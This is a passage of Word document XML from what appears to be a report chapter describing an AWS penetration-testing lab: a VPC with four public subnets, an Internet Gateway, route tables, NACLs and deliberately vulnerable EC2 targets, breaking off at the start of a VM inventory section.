          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.1.2 High-Level Architecture Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="39F1762B" w14:textId="42B1E764" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">As illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="00176715" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>gure 4.</w:t>
      </w:r>
      <w:r w:rsidR="00B8099D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, the testing environment is built entirely on AWS infrastructure. The architecture consists of a Virtual Private Cloud (VPC) named "VPC-Sim_Pentest" with the CIDR block 10.0.0.0/16, which serves as the foundation for all network components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F3286" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The VPC contains four distinct subnets, each representing a separate network segment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5235E5" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet_1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10.0.1.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA455F" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet_2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10.0.2.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74034F" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet_3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10.0.3.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFD792" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet_4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10.0.4.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEDEF34" w14:textId="76C6AB89" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">All subnets are configured as public subnets with direct internet connectivity through a central Internet Gateway. This design choice was made to simulate externally accessible </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">services and to allow testing of various attack vectors that originate from the internet. </w:t>
      </w:r>
      <w:r w:rsidR="00B8099D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Each subnet hosts one Amazon EC2 instance </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>running intentionally vulnerable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE7EC6" w14:textId="77777777" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00E7663C" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The network architecture employs the following key characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B524674" w14:textId="79C51228" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00024908" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sequential IP Addressing</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: The subnets use consecutive /24 CIDR blocks, providing a logical and easily manageable IP addressing scheme. This sequential allocation simplifies network traffic analysis, route table configuration, and documentation of attack paths during penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E657F6B" w14:textId="6B7EA8CD" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00024908" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized Internet Access</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: All subnets connect to the internet through a single Internet Gateway, eliminating the need for NAT Gateways. While this differs from typical production environments where private subnets would use NAT for outbound connectivity, it was chosen to reduce complexity and costs while still maintaining the core networking concepts relevant to penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D61D50" w14:textId="54B46906" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00024908" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet-Level Security Controls</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Each subnet is associated with a dedicated Network Access Control List (NACL), providing stateless firewall rules at the subnet boundary. This enables testing of ACL misconfigurations and bypass techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C050D05" w14:textId="634B5A77" w:rsidR="00E7663C" w:rsidRPr="00D77DFE" w:rsidRDefault="00024908" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">d) </w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inter-Subnet Communication</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: The route tables are configured to allow communication between all subnets within the VPC (10.0.0.0/16), simulating an environment where network segmentation relies on security groups and NACLs rather than complete network isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354D71A" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4BF8BD" w14:textId="30F84896" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc223521107"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Component Roles and Functions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="3FE0A910" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The architecture comprises several key components, each serving a specific purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C29751" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual Private Cloud (VPC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>The VPC provides an isolated virtual network environment within AWS, offering complete control over IP addressing, routing tables, and network gateways. It serves as the logical boundary for the entire testing infrastructure and enables network-level isolation from other AWS resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33C35C" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internet Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The Internet Gateway enables bidirectional communication between resources in the VPC and the internet. It serves two critical functions in this testing environment: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>allowing inbound connections to simulate external attacks against internet-facing services, and enabling outbound connectivity for instances to download tools, updates, and communicate with command-and-control servers during simulated attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA7E74" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>Each of the four subnets represents a distinct network segment within the enterprise environment. The /24 subnet mask provides 254 usable IP addresses per subnet, which is sufficient for the testing scenarios while maintaining simplicity. The subnets can be conceptually mapped to different organizational units or security zones in a real enterprise (e.g., DMZ, application tier, database tier, management network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713226C4" w14:textId="77777777" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>Each subnet has an associated route table that controls the routing of network traffic. The route tables contain two primary routes: a local route (10.0.0.0/16) for intra-VPC communication and a default route (0.0.0.0/0) pointing to the Internet Gateway for internet traffic. This configuration ensures that instances can communicate both within the VPC and with external resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C062C82" w14:textId="277B4974" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Access Control Lists (NACLs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>NACLs provide stateless, subnet-level firewall capabilities. Unlike security groups, which operate at the instance level, NACLs apply to all traffic entering or leaving a subnet. In this architecture, each subnet has a dedicated NACL, allowing for differentiated security policies and enabling testing of access control misconfigurations. The detailed NACL configurations are described in section 4.2.</w:t>
      </w:r>
      <w:r w:rsidR="00B8099D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8C601" w14:textId="07CADD68" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="00024908">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amazon EC2 Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>The EC2 instances serve as the target systems for penetration testing. These virtual machines run various operating systems and applications with intentional vulnerabilities and misconfigurations designed to simulate realistic attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC212B" w14:textId="25E53BDA" w:rsidR="006F3B1E" w:rsidRPr="00D77DFE" w:rsidRDefault="006F3B1E" w:rsidP="006F3B1E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc223521108"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E7663C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual Machine Inventory and Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1FDB2870" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006F3B1E" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The testing environment includes four Amazon EC2 instances, one deployed in each subnet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFDE3FD" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D79CFE0" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9EAB74" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
